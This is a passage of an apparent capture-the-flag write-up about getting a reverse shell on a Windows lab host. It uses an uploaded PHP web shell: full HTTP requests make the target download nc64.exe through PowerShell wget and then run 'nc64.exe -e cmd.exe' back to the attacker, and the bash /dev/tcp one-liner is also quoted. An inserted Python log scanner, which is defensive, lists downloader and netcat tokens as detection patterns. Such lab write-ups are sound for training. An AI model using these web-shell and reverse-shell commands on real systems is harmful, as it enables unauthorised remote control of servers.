
Remote Code Execution

We can perform some basic commands to discover that we are the www-data user.

Whoami

Whoami

Upload nc.exe for reverse shell

Since this is a Windows box, we cannot use the usual bash -i >& /dev/tcp/<ip>/<port> 0>&1 one-liner. The next simplest method is to upload a netcat binary through the same command-execution parameter.

GET /portal/uploads/nothing.php?cmd=powershell+-command+"wget+<ip>:<port>/nc64.exe+-O+nc64.exe" HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

There is a cron job which deletes any executable from the uploads directory, so we have to be fast: the binary must be launched before the cleanup runs.

Initiate the reverse shell

GET /portal/uploads/nothing.php?cmd=nc64.exe+<LHOST>+<LPORT>+-e+cmd.exe HTTP/1.1
Host: 10.10.10.228
Content-Length: 0
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close
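From the defender's side, the two requests above leave a very recognisable trace in the web server access log: a script executed from the uploads directory with a cmd parameter carrying a downloader and then a netcat-style command. The following Python scanner, an added example that is not part of the original writeup, flags that pattern over constructed sample log lines; the upload root, the log format and the client address (a documentation-range placeholder) are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style); not from the original page.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jun/2021:10:01:02 +0000] "GET /portal/php/files.php HTTP/1.1" 200 512
192.0.2.10 - - [12/Jun/2021:10:01:10 +0000] "GET /portal/uploads/nothing.php?cmd=whoami HTTP/1.1" 200 20
192.0.2.10 - - [12/Jun/2021:10:01:30 +0000] "GET /portal/uploads/nothing.php?cmd=powershell+-command+%22wget+192.0.2.10:8000/nc64.exe+-O+nc64.exe%22 HTTP/1.1" 200 0
192.0.2.10 - - [12/Jun/2021:10:01:35 +0000] "GET /portal/uploads/nothing.php?cmd=nc64.exe+192.0.2.10+4444+-e+cmd.exe HTTP/1.1" 200 0
192.0.2.11 - - [12/Jun/2021:10:02:00 +0000] "GET /portal/uploads/report.pdf HTTP/1.1" 200 9000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Extensions the server would execute if a script were planted under the upload root.
SCRIPT_EXT = ('.php', '.phtml', '.php5', '.phar', '.asp', '.aspx', '.jsp')
# Tokens that show the parameter is carrying a command: downloaders, shells, netcat-style binaries.
CMD_TOKENS = ('powershell', 'cmd.exe', 'wget', 'curl', 'certutil', 'nc64', 'nc.exe', 'ncat', '/dev/tcp')

def analyse_line(line, upload_root='/portal/uploads/'):
    """Return the reasons a log line looks like web-shell activity; empty list if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group('target'))
    path = parts.path.lower()
    reasons = []
    if path.startswith(upload_root) and path.endswith(SCRIPT_EXT):
        reasons.append('script executed from upload directory: ' + parts.path)
        # parse_qs undoes percent- and plus-encoding, so we see the command as the server ran it.
        for value in parse_qs(parts.query).get('cmd', []):
            reasons.append('cmd parameter present: ' + value)
            hits = [t for t in CMD_TOKENS if t in value.lower()]
            if hits:
                reasons.append('command-execution tokens: ' + ', '.join(hits))
    return reasons

def scan_log(text, upload_root='/portal/uploads/'):
    """Return [(client_ip, timestamp, reasons)] for every suspicious line in the log text."""
    findings = []
    for line in text.splitlines():
        reasons = analyse_line(line, upload_root)
        if reasons:
            m = LOG_RE.match(line)
            findings.append((m.group('ip'), m.group('ts'), reasons))
    return findings

if __name__ == '__main__':
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(ip, ts, *('  - ' + r for r in reasons), sep='\n')
```

A real deployment would pair this with the simpler control the log hints at: never serve scripts from the upload directory at all (deny script execution there at the web server), which makes the cmd parameter useless regardless of what gets uploaded.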

Obtain the shell

Reverse shell success!

We can then continue to explore the Windows machine.